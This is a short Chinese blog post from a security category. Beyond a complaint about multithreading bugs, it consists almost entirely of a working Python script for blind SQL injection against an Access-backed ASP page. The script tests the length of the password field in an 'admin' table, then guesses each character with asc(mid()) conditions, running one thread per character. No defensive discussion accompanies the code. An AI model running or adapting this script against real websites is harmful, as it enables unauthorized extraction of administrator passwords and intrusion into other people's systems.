ACCESS逐字猜解Python脚本

原创

忽如一夜春风来呸 2023-12-11 20:51:37 博主文章分类：网络安全 ©著作权

©著作权归作者所有：来自51CTO博客作者忽如一夜春风来呸的原创作品，请联系作者获取转载授权，否则将追究法律责任

多线程真jb多Bug，改了半天才改完，再也不搞多线程了，mmp

var code = "db8ab52e-e39d-4cad-8b05-0aca3c5445eb"

import requests
import time
from threading import Thread, Lock


def ACESS_INJECTION_SQL():
	# 站点
    site = "http://10.0.0.35:81/Production/PRODUCT_DETAIL.asp?id=1513"
    # 表名
    table = "admin"
    # 字段名
    field = "password"
    mutex = Lock()
    field_length = 0
    result_dict = {}
    result_list = []

    # 判断字段长度
    for i in range(1, 1000):
        s = f"{site} and (select top 1 len({field}) from {table})={i}"
        if requests.get(url=s).status_code == 200:
            field_length = i
            break

    # 猜解字段数据
    def Field_Guessing(a):
        for i in range(1, 129):
            r_site = f"{site} and (select top 1 asc(mid({field},{a},1)) from {table})={i}"
            status_code = requests.get(url=r_site).status_code
            if status_code == 200:
                mutex.acquire()
                result_dict[a] = chr(i)
                mutex.release()
                print("猜解成功 " + chr(i))
                break
            print("猜解错误 " + str(i))

    t_list = []
    for i in range(1, field_length + 1):
        t = Thread(target=Field_Guessing, args=(i,))
        t.start()
        t_list.append(t)

    for t in t_list:
        t.join()

    sorted_dict = {k: result_dict[k] for k in sorted(result_dict, key=lambda x: int(x))}
    # print(sorted_dict)
    for i in sorted_dict:
        result_list.append(sorted_dict[i])
    return ''.join(result_list)


if __name__ == '__main__':
    print("开始猜解数据...")
    start_time = time.time()
    result = ACESS_INJECTION_SQL()
    print("Result: " + result)
    stop_time = time.time()
    print("Time: " + str(stop_time - start_time))